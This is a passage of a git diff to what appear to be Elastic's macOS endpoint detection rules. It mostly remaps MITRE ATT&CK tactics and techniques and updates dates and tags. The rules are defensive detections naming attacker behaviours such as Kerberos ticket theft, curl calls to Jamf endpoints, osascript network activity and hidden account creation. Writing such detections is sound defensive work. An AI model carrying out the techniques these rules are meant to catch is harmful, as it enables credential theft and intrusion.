"T1548" - reference = "https://attack.mitre.org/techniques/T1548/" - - [[rule.threat.technique.subtechnique]] - name = "TCC Manipulation" - id = "T1548.006" - reference = "https://attack.mitre.org/techniques/T1548/006/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/macos/discovery_suspicious_sip_check.toml b/rules/macos/discovery_suspicious_sip_check.toml index cf48e7fe8b7..e2fd4a9eab1 100644 --- a/rules/macos/discovery_suspicious_sip_check.toml +++ b/rules/macos/discovery_suspicious_sip_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -74,22 +74,30 @@ process where host.os.type == "macos" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Discovery" - id = "TA0007" - reference = "https://attack.mitre.org/tactics/TA0007/" - - [[rule.threat.technique]] - name = "System Information Discovery" - id = "T1082" - reference = "https://attack.mitre.org/techniques/T1082/" - - [[rule.threat.technique]] - name = "Virtualization/Sandbox Evasion" - id = "T1497" - reference = "https://attack.mitre.org/techniques/T1497/" - - [[rule.threat.technique.subtechnique]] - name = "System Checks" - id = "T1497.001" - reference = "https://attack.mitre.org/techniques/T1497/001/" +[[rule.threat.technique]] +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/macos/discovery_system_and_network_configuration_check.toml b/rules/macos/discovery_system_and_network_configuration_check.toml index 05dfd0e7ded..c19554c1387 100644 --- a/rules/macos/discovery_system_and_network_configuration_check.toml +++ b/rules/macos/discovery_system_and_network_configuration_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -71,17 +71,12 @@ file where host.os.type == "macos" and event.action == "open" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Discovery" - id = "TA0007" - reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" - [[rule.threat.technique]] - name = "System Information Discovery" - id = "T1082" - reference = "https://attack.mitre.org/techniques/T1082/" - - [[rule.threat.technique]] - name = "System Network Configuration Discovery" - id = "T1016" - reference = "https://attack.mitre.org/techniques/T1016/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/macos/discovery_users_domain_built_in_commands.toml b/rules/macos/discovery_users_domain_built_in_commands.toml index 6720bc025b4..94be2280f1e 100644 --- a/rules/macos/discovery_users_domain_built_in_commands.toml +++ b/rules/macos/discovery_users_domain_built_in_commands.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -105,29 +105,38 @@ Built-in macOS commands like `ldapsearch`, `dsmemberutil`, and `dscl` are essent [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" reference = "https://attack.mitre.org/techniques/T1069/001/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1087/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml index 6ec5857b809..f61613a511a 100644 --- a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml +++ b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -48,15 +48,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -103,26 +95,18 @@ Electron applications, built on Node.js, can execute child processes using the ` [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml index 3280689d092..39cc78ca42e 100644 --- a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml +++ b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -106,26 +106,31 @@ Web browsers are integral to user interaction with the internet, often serving a [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1189" name = "Drive-by Compromise" reference = "https://attack.mitre.org/techniques/T1189/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/macos/execution_installer_package_spawned_network_event.toml b/rules/macos/execution_installer_package_spawned_network_event.toml index f54b8347f48..d69784d76b8 100644 --- a/rules/macos/execution_installer_package_spawned_network_event.toml +++ b/rules/macos/execution_installer_package_spawned_network_event.toml @@ -2,7 +2,7 @@ creation_date = "2021/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -112,36 +112,36 @@ MacOS installer packages, often with a .pkg extension, are used to distribute so [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" - - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/macos/execution_python_shell_spawn_first_occurrence.toml b/rules/macos/execution_python_shell_spawn_first_occurrence.toml index 6da50e09b03..19c07e9db90 100644 --- a/rules/macos/execution_python_shell_spawn_first_occurrence.toml +++ b/rules/macos/execution_python_shell_spawn_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,10 +76,17 @@ not process.command_line:(*pip* or *conda* or *brew* or *jupyter*) [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique.subtechnique]] id = "T1059.006" name = "Python" @@ -89,7 +96,6 @@ reference = "https://attack.mitre.org/techniques/T1059/006/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.executable"] diff --git a/rules/macos/execution_script_via_automator_workflows.toml b/rules/macos/execution_script_via_automator_workflows.toml index a5320a95420..0fc33f5e576 100644 --- a/rules/macos/execution_script_via_automator_workflows.toml +++ b/rules/macos/execution_script_via_automator_workflows.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -97,14 +97,18 @@ Automator, a macOS utility, allows users to automate repetitive tasks through wo [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml index f657656b65c..24770fce50b 100644 --- a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml +++ b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -108,31 +108,31 @@ AppleScript, a scripting language for macOS, automates tasks by controlling appl [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.002" name = "AppleScript" reference = "https://attack.mitre.org/techniques/T1059/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/macos/execution_shell_execution_via_apple_scripting.toml b/rules/macos/execution_shell_execution_via_apple_scripting.toml index 03218b38b18..dca693e0d11 100644 --- a/rules/macos/execution_shell_execution_via_apple_scripting.toml +++ b/rules/macos/execution_shell_execution_via_apple_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,14 +101,28 @@ AppleScript and JXA are scripting languages used in macOS to automate tasks and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/execution_unusual_library_load_via_python.toml b/rules/macos/execution_unusual_library_load_via_python.toml index 99c96e54eed..be7f92e752a 100644 --- a/rules/macos/execution_unusual_library_load_via_python.toml +++ b/rules/macos/execution_unusual_library_load_via_python.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,17 +82,12 @@ library where host.os.type == "macos" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml index b89f017f619..a5996a567c2 100644 --- a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml +++ b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -45,14 +45,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -164,19 +157,43 @@ Microsoft Office applications on macOS can be exploited by adversaries to execut [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml index 23775e46154..15870020bd0 100644 --- a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml +++ b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,36 +103,36 @@ Kerberos is a network authentication protocol designed to provide secure identit [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.003" -name = "Pass the Ticket" -reference = "https://attack.mitre.org/techniques/T1550/003/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [[rule.threat.technique.subtechnique]] id = "T1558.003" name = "Kerberoasting" reference = "https://attack.mitre.org/techniques/T1558/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.003" +name = "Pass the Ticket" +reference = "https://attack.mitre.org/techniques/T1550/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml index 5d7922d88c6..6244c0b65f5 100644 --- a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml +++ b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -45,14 +45,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -101,19 +94,13 @@ The `systemsetup` command in macOS is a utility that allows administrators to co [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml b/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml index e96f7b9451c..e07d5fce074 100644 --- a/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml +++ b/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -19,15 +19,7 @@ name = "Suspicious Curl to Jamf Endpoint" risk_score = 73 rule_id = "a8256685-9736-465b-b159-f25a172d08e8" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" note = """## Triage and analysis @@ -78,25 +70,12 @@ process where host.os.type == "macos" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Lateral Movement" - id = "TA0008" - reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat.technique]] +id = "T1072" +name = "Software Deployment Tools" +reference = "https://attack.mitre.org/techniques/T1072/" - [[rule.threat.technique]] - name = "Software Deployment Tools" - id = "T1072" - reference = "https://attack.mitre.org/techniques/T1072/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Software Deployment Tools" - id = "T1072" - reference = "https://attack.mitre.org/techniques/T1072/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/macos/lateral_movement_vpn_connection_attempt.toml b/rules/macos/lateral_movement_vpn_connection_attempt.toml index 448fb9b9bff..94da2795aeb 100644 --- a/rules/macos/lateral_movement_vpn_connection_attempt.toml +++ b/rules/macos/lateral_movement_vpn_connection_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -48,14 +48,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -105,14 +98,13 @@ Virtual Private Networks (VPNs) are used to securely connect to remote networks, [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/macos/persistence_account_creation_hide_at_logon.toml b/rules/macos/persistence_account_creation_hide_at_logon.toml index 8ffa3621827..e871422d1c8 100644 --- a/rules/macos/persistence_account_creation_hide_at_logon.toml +++ b/rules/macos/persistence_account_creation_hide_at_logon.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -44,14 +44,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -98,19 +91,31 @@ In macOS environments, the `dscl` command-line utility manages directory service [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" +[[rule.threat.technique.subtechnique]] +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_apple_mail_rule_modification.toml b/rules/macos/persistence_apple_mail_rule_modification.toml index 4e7a49b2daa..22c83563e54 100644 --- a/rules/macos/persistence_apple_mail_rule_modification.toml +++ b/rules/macos/persistence_apple_mail_rule_modification.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,25 +81,12 @@ file where host.os.type == "macos" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique]] - name = "Event Triggered Execution" - id = "T1546" - reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "User Execution" - id = "T1204" - reference = "https://attack.mitre.org/techniques/T1204/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_creation_change_launch_agents_file.toml b/rules/macos/persistence_creation_change_launch_agents_file.toml index 25970d8647b..7ad252a6bd9 100644 --- a/rules/macos/persistence_creation_change_launch_agents_file.toml +++ b/rules/macos/persistence_creation_change_launch_agents_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -100,19 +100,18 @@ Launch Agents in macOS are used to execute scripts or applications automatically [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.001" -name = "Launch Agent" -reference = "https://attack.mitre.org/techniques/T1543/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_creation_hidden_login_item_osascript.toml b/rules/macos/persistence_creation_hidden_login_item_osascript.toml index 1dd6607c7eb..ac0eaca6c1d 100644 --- 